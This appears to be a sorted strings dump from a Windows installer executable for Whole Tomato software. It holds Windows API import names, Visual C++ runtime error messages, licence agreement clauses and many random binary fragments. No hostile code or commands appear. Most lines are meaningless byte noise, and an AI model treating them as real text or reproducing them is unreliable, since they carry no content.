GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
GEwuge
G\|<kXV
gpv`FPV@
gq7ZHPWN
gqwaGQRA
gqwaGQWA
gqwaGQWAv
gqwR*Q2A
GRANT. Subject to the terms of this Agreement, Whole Tomato Software, Inc. ("Whole Tomato") hereby grants you a limited, personal, nontransferable, nonsublicensable, royalty-free, nonexclusive license to use one copy of the client software product you are about to install in object code form ("Software"). You may copy the Software for archival purposes, provided any copy must contain all of the original Software's proprietary notices. 
h	AZq$
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
hi+nWK
H&.kUy1
.!H<%Zcv
h-Z_U[]
I1R%s]dd
I7I1}*K
IB|~qO
iB u8=8
!?ijb4
IMc,S,
I'NaV-
InitializeCriticalSectionAndSpinCount
INQGXm
InterlockedDecrement
InterlockedIncrement
!iQ|5J
IQ+j&y0
,i>R4A.
IsDebuggerPresent
IsValidCodePage
iXiFy;=9.
|i!Y1IA9Q)a
i!Y1IA9Q)a
,i\yLI|Yl
j1X]HMEehq
J3Iqkf
~J4&$%
JanFebMarAprMayJunJulAugSepOctNovDec
January
`j;bF7I #J
JEzuJ#`
(%JgC(%
j@j ^V
Jq5K-k
j>rU(S
~j`u6c,m
j"Vj-j
JXCOhpsm%
J}xX-Do
J`zijY
	/[K7|
KERNEL32.dll
KOxy{}lt
kq{a8Q[A
kS!*Lj
Last modified: May 9, 2012
LCMapStringA
LCMapStringW
LeaveCriticalSection
?LH{#h	
@lI!AV
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
ljw'i*A
lkq	~,
L-\]$M<}
[lM|bt
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadLibraryA
LoadResource
LoadStringA
LockResource
-L#S/4
LSku ^
lstrcmpiA
m5@M%C
m6\&pV?F/v
M6Y69RnV
]][ m7
MessageBoxA
Microsoft Visual C++ Runtime Library
MISCELLANEOUS. This Agreement represents the complete agreement concerning this license between the parties and supersedes all prior agreements and representations between them. It may be amended only by a writing executed by both parties. If any provision of this Agreement is held to be unenforceable for any reason, such provision shall be reformed only to the extent necessary to make it enforceable. This Agreement shall be governed by and construed under California law as such law applies to agreements between California residents entered into and to be performed within California. 
MM/dd/yy
!!Mmzk
{Mo KO#
Monday
m&?]r%X
MultiByteToWideChar
}|mY9`
N\/A' 
na~ezugE.'
 :n]I3
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
@nqk$S
NxKS[.
o1cd2t
o)!A_I,
?>O<BM
o"B]Qa
October
.ofLXG
o|`*N>
Oy4c*C
oy>,&q6NJj
p!0A0!p
p!0A0!P!P!
p16vW|vq
P6_&OV>F.v
p`I+]f
"<(pIOI
Please contact the application's support team for more information.
PPPPPPPP
Program: 
<program name unknown>
pRsD<r~
- pure virtual function call
pVBg/u
Q44nAoZxat}
:Q7Z8N
`qc&Vs
qgG>]2
]Qj7LNl
QPAbq`a 
QueryPerformanceCounter
qvaF4WC
 #?QWA
qwaGQWA
(q$YM";
&>r!%"
r6bK6t_
[R9~Ig
`.rdata
RegConnectRegistryA
RegisterClassExA
RegOpenKeyExA
rnj3A;HoY
RtlUnwind
runtime error 
Runtime Error!
Rup[f6
,;RY4T
s7''Pvrzf
Saturday
s&Bf[Q 
sbX9<^
September
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
Sg9w	G
ShowWindow
SING error
SOFTWARE LICENSE AGREEMENT
strcat
Su(:KJN
Sunday
SunMonTueWedThuFriSat
SWVFZ:
=T2D=r
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
:T*EVR
TextOutA
t$h4xB
The Software may be installed on more than one computer provided that you are the exclusive user of the Software. As used in this context, "you" shall be defined as an individual human person.
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
This Software is protected by both the United States copyright laws and international copyright treaty provisions. You must treat the Software like any other copyrighted material -- for example, a book, except that you may copy it onto a computer to be used and you may make archival copies of the Software for the sole purpose of backing-up our Software and protecting your investment from loss. 
Thursday
TITLE. As between the parties, title, ownership rights, and intellectual property rights in and to the Software, and any copies or portions thereof, shall remain in Whole Tomato and its suppliers or licensors. The Software is protected by the copyright laws of the United States and international copyright treaties. Title, ownership rights, and intellectual property rights in and to any software, data, information, text, pictures, images, or other content ("Content") accessed through the Software or otherwise is the property of the applicable owner and may be protected by applicable copyright or other law. This License gives you no rights, title, or interest to Content (including without limitation Content that you create using the Software). 
$t	jpY
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateAcceleratorA
TranslateMessage
TrE"wtDxgqtaE"WA
TrX:<s
t"SS9]
{+)tTS	B
t$<"u	3
Tuesday
;t$,v-
tV5M:D
t+WWVPV
u	1mahz
^U],4q
/U-ahB
uFIVaf-v
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UpdateWindow
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
U.S. GOVERNMENT RESTRICTED RIGHTS. Use, duplication or disclosure by the Government is subject to restrictions set forth in subparagraphs (a) through (d) of the Commercial Computer-Restricted Rights clause at FAR 52.227-19 when applicable, or in subparagraph (c) (1) (ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013, and in similar clauses in the NASA FAR Supplement. 
Uu"0aw5
U,^zxxvq
V0F sX&NZ
}+v1A!$
v70>G(
vc&hZ4
V}Dmt]noO
V;F+v.f
VirtualAlloc
VirtualFree
v	N+D$
!vQfAWqGa
VUF_vnfn
VwLp4s
Wednesday
}WGN{=w
whgxWtG
WideCharToMultiByte
wigxWHGX
!wQgAkqx%?
"wRgBWrGe
WriteFile
"wUgEWuGe
wwwwwwwwwww
x]2O 5
x(^<^3
X4Wyx]hI
x/8O8/x
/XF*fy6
x/]G3	
xqhaXQHA
!X$Xathx
=XY#v{
+y0S3N
Y?6`Kzt-
y!g8Bw
You may not, directly or indirectly: modify, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction), create derivative works based on, or otherwise attempt to discover the source code or underlying ideas or algorithms of the Software; or copy (except for archival purposes as set forth above), rent, lease, distribute, transfer or otherwise transfer rights to the Software; use the Software for timesharing or service bureau purposes; or remove any proprietary notices or labels on the Software. 
YQV^1Y!
>=Yt1j
y@	X@J
Z8R7w3
z'IwjHB
Z.ly"6`
Z--tp"
Zwn+PW
zzf-IF
ZZXgT:V